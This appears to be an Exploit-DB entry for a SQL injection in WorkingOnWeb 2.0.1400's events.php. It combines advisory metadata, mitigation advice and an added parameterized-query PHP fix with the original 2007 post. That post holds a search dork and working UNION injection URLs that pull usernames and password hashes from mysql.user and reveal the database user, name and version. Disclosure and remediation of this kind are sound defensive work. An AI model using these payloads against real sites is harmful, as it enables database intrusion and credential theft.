Remote SQL Injection
Vendor: WorkingOnWeb
By: ka0x
CVSS: 7.5 (HIGH)
CWE: 89
Product Name: WorkingOnWeb
Affected Version From: WorkingOnWeb 2.0.1400
Affected Version To: WorkingOnWeb 2.0.1400
Patch Exists: NO
2007

WorkingOnWeb 2.0.1400 Remote SQL Injection

The vulnerability allows an attacker to perform a SQL injection attack by manipulating the 'idevent' parameter of the 'events.php' page. Because the parameter is interpolated directly into a SELECT statement without validation or quoting, injected SQL is executed by the database, and an attacker can retrieve sensitive information from the MySQL database, such as usernames and passwords from the 'mysql.user' table. The vulnerability is located in line 4 of the code snippet below.

Mitigation:

To mitigate this vulnerability, use prepared statements or parameterized queries instead of concatenating user input directly into SQL strings. Additionally, validate and sanitize input before it reaches the query: in this case 'idevent' is compared against a numeric column, so anything that is not a plain integer should be rejected rather than passed on to the database.
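A hardened form of the vulnerable lookup, added here as an illustration and not part of the original advisory or of the WorkingOnWeb code base; it assumes PHP's mysqli extension with the mysqlnd driver, and the connection parameters and table layout shown are hypothetical apart from the column and table names taken from the advisory.

```php
<?php
// Added example: the same conference lookup as in the advisory, rewritten so
// that the 'idevent' parameter can never be interpreted as SQL.
// Connection details are hypothetical placeholders.
$db = new mysqli('localhost', 'app_user', 'app_password', 'workingonweb');
if ($db->connect_error) {
    http_response_code(500);
    exit('database unavailable');
}

// 1. Validate: the identifier must be a positive integer, nothing else.
//    FILTER_VALIDATE_INT returns false for input such as '-1/**/union...'
//    and null when the parameter is absent, so both cases are rejected.
$idevent = filter_input(INPUT_GET, 'idevent', FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 1]]);
if ($idevent === false || $idevent === null) {
    http_response_code(400);
    exit('invalid event id');
}

// 2. Parameterize: the value is bound as an integer and sent to MySQL
//    separately from the query text, so no UNION can be spliced into it.
$sql = 'SELECT cnf_shortname, cnf_name, cnf_begindate, cnf_enddate, cnf_city, '
     . 'cnf_email, cnf_url, cnf_imgpath, cnf_country '
     . 'FROM conference '
     . 'WHERE id_conference = ? AND cnf_private = 0';
$stmt = $db->prepare($sql);
if ($stmt === false) {
    http_response_code(500);
    exit('query preparation failed');
}
$stmt->bind_param('i', $idevent);   // 'i' = integer placeholder
$stmt->execute();
// get_result() requires mysqlnd; with the libmysql driver use bind_result().
$row = $stmt->get_result()->fetch_object();
$stmt->close();

if ($row === null) {
    http_response_code(404);
    exit('no such event');
}
// $row is now safe to use; escape with htmlspecialchars() when rendering.
?>
```

Even with the integer check alone the original UNION payloads fail, but the prepared statement is the control that holds when a future change passes a string through the same path.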
Source: Exploit-DB raw data


WorkingOnWeb 2.0.1400 Remote SQL Injection
d0rk: Powered by WorkingOnWeb 2.0.1400
bug found by ka0x - D.O.M TEAM
contact: ka0x01[!]gmail.com
we: ka0x, an0de, xarnuz, s0cratex, Hendrix
#from spain


1: <?
2: $query = "SELECT cnf_shortname, cnf_name, cnf_begindate, cnf_enddate, cnf_city, cnf_email, cnf_url, cnf_imgpath, cnf_country ".
3:          "FROM conference ".
4:          "WHERE id_conference = $HTTP_GET_VARS[idevent] ".
5:          " AND cnf_private=0";
6: $result = mysql_query($query);
7: $row = mysql_fetch_object($result);
8: ?>

vulnerability in line 4.

user and password from mysql.user:
http://localhost/events.php?idevent=-1/**/union/**/select/**/concat(user,0x203a3a20,password),null,0,0,0,0,0,0,0/**/from/**/mysql.user/*

Information:
http://localhost/events.php?idevent=-1/**/union/**/select/**/user(),2,3,4,1,1,1,1,1/*
http://localhost/events.php?idevent=-1/**/union/**/select/**/database(),2,3,4,1,1,1,1,1/*
http://localhost/events.php?idevent=-1/**/union/**/select/**/version(),2,3,4,1,1,1,1,1/*

-- 
// ka0x

# milw0rm.com [2007-11-24]